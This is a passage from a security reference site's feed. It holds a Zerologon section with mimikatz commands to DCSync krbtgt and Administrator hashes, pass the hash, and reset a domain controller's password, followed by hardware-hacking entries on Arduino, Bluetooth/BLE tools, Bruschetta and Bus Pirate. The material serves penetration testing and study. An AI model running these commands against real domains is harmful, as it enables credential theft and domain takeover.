class="n"&gt;krbtgt&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;authuser&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;DC01&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;authdomain&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;LAB&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;authpassword&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;authntlm&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lsadump&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;dcsync&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;LAB&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LOCAL&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;dc&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;DC01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LAB&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LOCAL&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Administrator&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;authuser&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;DC01&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;authdomain&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;LAB&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;authpassword&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;authntlm&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Pass The Hash with the extracted Domain Admin hash&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sekurlsa&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;pth&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Administrator&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;LAB&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;rc4&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;HASH_NTLM_ADMIN&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Use IP address instead of FQDN to force NTLM with Windows APIs &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Reset password to Waza1234/Waza1234/Waza1234/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lsadump&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;postzerologon&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;account&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;DC01&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;netexec&lt;/code&gt; - only check&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;netexec&lt;/span&gt; &lt;span class="n"&gt;smb&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt; &lt;span class="n"&gt;-M&lt;/span&gt; &lt;span class="n"&gt;zerologon&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A 2nd approach to exploit zerologon is done by relaying authentication.&lt;/p&gt;</description></item><item><title>Arduino</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/arduino/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/arduino/</guid><description>&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/aster94/logic-analyzer"&gt;Logic Analyzer for Arduino, AVR, ESP8266 and STM32 - aster94/logic-analyzer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/cyphunk/JTAGenum"&gt;JTAGulator-like for Arduino, Teensy, STM32 Bluepill, Texas Instruments Tiva and RaspberryPi - cyphunk/JTAGenum&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.arduino.cc/"&gt;Arduino - Official Website&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Bluetooth</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/bluetooth/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/bluetooth/</guid><description>&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/bettercap/bettercap"&gt;bettercap/bettercap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://manpages.debian.org/unstable/bluez/gatttool.1.en.html"&gt;bluez/gatttool&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://expliot.readthedocs.io/en/latest/index.html"&gt;expliot_framework/expliot&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hackgnar/bleah"&gt;hackgnar/bleah&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/praetorian-inc/caeruleus"&gt;praetorian-inc/caeruleus&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/securing/gattacker"&gt;securing/gattacker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/whad-team/whad-client"&gt;whad-team/whad-client&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="bluetooth-configuration" class="anchored-heading"&gt;Bluetooth configuration&lt;a class="heading-anchor" href="#bluetooth-configuration" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Requirements and configuration for Kali Linux.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;apt-get&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;bluetooth&lt;/span&gt; &lt;span class="n"&gt;blueman&lt;/span&gt; &lt;span class="n"&gt;bluez&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;systemctl&lt;/span&gt; &lt;span class="nb"&gt;start &lt;/span&gt;&lt;span class="n"&gt;bluetooth&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;hciconfig&lt;/span&gt; &lt;span class="n"&gt;hci0&lt;/span&gt; &lt;span class="n"&gt;up&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Enumerate Bluetooth devices&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;hcitool&lt;/span&gt; &lt;span class="n"&gt;lescan&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mf"&gt;00&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;1A&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;7D&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;DA&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;71&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;06&lt;/span&gt; &lt;span class="n"&gt;Ph0wn&lt;/span&gt; &lt;span class="n"&gt;Beacon&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mf"&gt;25&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;55&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;84&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;20&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;73&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;70&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;unknown&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;blockquote&gt;
&lt;p&gt;[!CAUTION]
&lt;code&gt;apt&lt;/code&gt; doesn&amp;rsquo;t have a recent version of bluez, recompile it with the following lines.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;wget &lt;/span&gt;&lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;www&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;kernel&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;org&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;pub&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;linux&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bluetooth&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bluez&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5.18&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;tar&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;xz&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;dpkg&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-get-selections&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="n"&gt;grep&lt;/span&gt; &lt;span class="n"&gt;-v&lt;/span&gt; &lt;span class="n"&gt;deinstall&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="n"&gt;grep&lt;/span&gt; &lt;span class="n"&gt;bluez&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;tar&lt;/span&gt; &lt;span class="n"&gt;xvf&lt;/span&gt; &lt;span class="n"&gt;bluez&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5.18&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;tar&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;xz&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;apt-get&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;libglib2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;0&lt;/span&gt;&lt;span class="n"&gt;-dev&lt;/span&gt; &lt;span class="n"&gt;libdbus&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="n"&gt;-dev&lt;/span&gt; &lt;span class="nb"&gt;libusb-dev&lt;/span&gt; &lt;span class="nb"&gt;libudev-dev&lt;/span&gt; &lt;span class="nb"&gt;libical-dev&lt;/span&gt; &lt;span class="n"&gt;systemd&lt;/span&gt; &lt;span class="nb"&gt;libreadline-dev&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;configure&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-enable-library&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;make&lt;/span&gt; &lt;span class="n"&gt;-j8&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;make&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;cp &lt;/span&gt;&lt;span class="n"&gt;attrib&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;gatttool&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;usr&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;local&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="ble---tools-cheatsheet" class="anchored-heading"&gt;BLE - Tools Cheatsheet&lt;a class="heading-anchor" href="#ble---tools-cheatsheet" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Use Case&lt;/th&gt;
 &lt;th&gt;Previous Method&lt;/th&gt;
 &lt;th&gt;Using Caeruleus&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Discovering nearby devices&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;hcitool lescan&lt;/code&gt;&lt;br&gt;&lt;code&gt;bettercap ble.recon&lt;/code&gt;&lt;br&gt;&lt;code&gt;bluetoothctl scan on&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;caeruleus scan&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Listing (and reading) services/characteristics&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;bettercap ble.enum &amp;lt;mac&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;caeruleus enumerate -b &amp;lt;mac&amp;gt; --values&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;An interactive session&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;gatttool -I&lt;/code&gt;&lt;br&gt;&lt;code&gt;bluetoothctl&lt;/code&gt; (menu GATT)&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;caeruleus shell -b &amp;lt;mac&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Reading a handle&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;gatttool --char-read-hnd 0x0013&lt;/code&gt;&lt;br&gt;&lt;code&gt;bluetoothctl&lt;/code&gt; select-attribute + read&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;caeruleus read -b &amp;lt;mac&amp;gt; -a 0x0013&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Writing to a handle&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;gatttool -b de:ad:be:ef:be:f1 --char-write-req -a 0x002c -n $(echo -n &amp;quot;some value&amp;quot; | xxd -ps)&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;caeruleus write -b de:ad:be:ef:be:f1 -a 0x002c --req -s &amp;quot;some value&amp;quot;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Capturing notifications&lt;/td&gt;
 &lt;td&gt;Custom Bleak notification logger&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;caeruleus listen -b &amp;lt;mac&amp;gt; -a &amp;lt;handle&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Checking for unauth data exposure and characteristics that don’t require encryption&lt;/td&gt;
 &lt;td&gt;Custom Bleak audit scripts&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;caeruleus recon&lt;/code&gt; / &lt;code&gt;caeruleus assess ...&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Fuzzing a characteristic&lt;/td&gt;
 &lt;td&gt;Custom write fuzzers / boofuzz&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;caeruleus fuzz write -b &amp;lt;mac&amp;gt; -a &amp;lt;handle&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Connection params, MTU&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;hcitool con&lt;/code&gt;&lt;br&gt;&lt;code&gt;btmgmt con-info&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;caeruleus conn-params -b &amp;lt;mac&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Adapter power and recovery&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;btmgmt power&lt;/code&gt;&lt;br&gt;&lt;code&gt;hciconfig reset&lt;/code&gt;&lt;br&gt;&lt;code&gt;rfkill&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;caeruleus doctor&lt;/code&gt;&lt;br&gt;&lt;code&gt;caeruleus adapter power cycle&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="ble---enumerate-services-and-characteristics" class="anchored-heading"&gt;BLE - Enumerate services and characteristics&lt;a class="heading-anchor" href="#ble---enumerate-services-and-characteristics" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;BLE is based on specification called General Attribute profile (GATT), that defines how communication/data transfer between client and server.&lt;/p&gt;</description></item><item><title>Bruschetta</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/bruschetta-board/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/bruschetta-board/</guid><description>&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://github.com/whid-injector/BRUSCHETTA-board/raw/main/images/Mode%202%20-%20SPI%20and%20I2C.jpg" alt="BRUSCHETTA" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;BRUSCHETTA&lt;/figcaption&gt;&lt;/figure&gt;&lt;h2 id="documentation" class="anchored-heading"&gt;Documentation&lt;a class="heading-anchor" href="#documentation" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/whid-injector/BRUSCHETTA-Board"&gt;whid-injector/BRUSCHETTA-Board&lt;/a&gt; - The Multi-Protocol Swiss-Army-Knife for Hardware Hackers (UART/JTAG/SPI/I2C)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/whid-injector/PIZZAbite"&gt;whid-injector/PIZZAbite&lt;/a&gt; - A cheaper and open-hardware version of the blasoned Sensepeek&amp;rsquo;s PCBite for Hardware Hacking and DIY Hobbyists&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Bruschetta is the latest board to interact with Hardware, it is an upgraded version of these projects.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/whid-injector/Focaccia-Board"&gt;whid-injector/Focaccia-Board&lt;/a&gt; - Multipurpose Breakout for the FT232H&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/whid-injector/Burtleina-Board"&gt;whid-injector/Burtleina-Board&lt;/a&gt; - Yet another Multipurpose Breakout Board to hack hardware in a clean and easy way&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/whid-injector/NANDo-board"&gt;whid-injector/NANDo-board&lt;/a&gt; - 2nd Generation of Multipurpose FTDI-based board for Hardware Hacking and IoT Security Testing&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="usage" class="anchored-heading"&gt;Usage&lt;a class="heading-anchor" href="#usage" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Mode 2 (UART1+I2C+SPI-VCP): S1=ON and S2=OFF&lt;/li&gt;
&lt;li&gt;Mode 4 (UART1+JTAG): S1=ON and S2=ON&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=r7BOBPbq83M"&gt;🍕PIZZAbite &amp;amp; BRUSCHETTA-board: The Hardware Hacking Toolkit you need for your own Lab! 🇮🇹 - WHID - We Hack In Disguise - 28 sept. 2023&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.whid.ninja/blog/pizzabite-bruschetta-board-the-hardware-hackers-tools-you-need-to-kickstart-your-own-lab"&gt;PIZZAbite &amp;amp; BRUSCHETTA-board: The Hardware Hackers tools you need to kickstart your own Lab! - WHID - We Hack In Disguise - SEP 28, 2023&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://lucabongiorni.medium.com/hacking-iot-rf-devices-with-b%C3%BCrtleinaboard-165e246b1ed0"&gt;Hacking IoT &amp;amp; RF Devices with BürtleinaBoard™ - Luca Bongiorni - Jul 27, 2020&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Bus Pirate</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/bus-pirate/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/bus-pirate/</guid><description>&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://bokkapig.pages.dev/refs/hardware/assets/image-bus-pirate.png" alt="BusPirate" width="600" height="234" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;BusPirate&lt;/figcaption&gt;&lt;/figure&gt;&lt;h2 id="firmwares" class="anchored-heading"&gt;Firmwares&lt;a class="heading-anchor" href="#firmwares" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/BusPirate/Bus_Pirate"&gt;BusPirate/Bus_Pirate&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;&lt;span class="n"&gt;Bus_Pirate&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;package&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;BPv4-firmware&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;pirate-loader&lt;/span&gt;&lt;span class="n"&gt;-v4-source&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;pirate-loader_lnx&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="nb"&gt;pirate-loader_lnx&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-dev&lt;/span&gt;&lt;span class="p"&gt;=/&lt;/span&gt;&lt;span class="n"&gt;dev&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ttyACM0&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-hex&lt;/span&gt;&lt;span class="p"&gt;=../&lt;/span&gt;&lt;span class="nb"&gt;BPv4-firmware&lt;/span&gt;&lt;span class="n"&gt;-v6&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;3&lt;/span&gt;&lt;span class="n"&gt;-r2151&lt;/span&gt;&lt;span 